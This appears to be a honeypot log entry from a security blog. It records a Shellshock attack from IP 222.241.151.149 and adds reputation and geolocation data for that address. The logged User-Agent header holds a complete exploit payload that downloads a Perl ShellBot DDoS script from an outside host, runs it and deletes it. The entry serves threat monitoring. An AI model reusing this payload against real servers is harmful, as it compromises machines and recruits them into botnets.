Sonntag, 16. August 2015

Perl DDoS Bot - 222.241.151.149

BEGIN OF HTTP DATA:
2015-08-16 17:09:08
Source IP: 222.241.151.149
Country: CN RiskScore: 1 Malware: []
GET /cgi-bin/php5 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://www.7soles.com/js
/a2.log -O /tmp/a2.log;curl -O /tmp/a2.log http://www.7soles.com/js/a2.log;perl /tmp/a2.log;rm -rf /tmp/a2.log*");'
Host: 109.234.106.8
Connection: Close
The downloadable perl script is identified as
a2.log: Perl.ShellBot-4 FOUND


Blacklist StatusBLACKLISTED 5/40
IP Address222.241.151.149 ( Websites Lookup )
Reverse DNSUnknown
ASNAS4134
ASN OwnerChinanet
ISPChinanet Hunan Province Network
ContinentAsia
Country CodeFlag (CN) China
Latitude / Longitude28.1792 / 113.114
CityChangsha
RegionHunan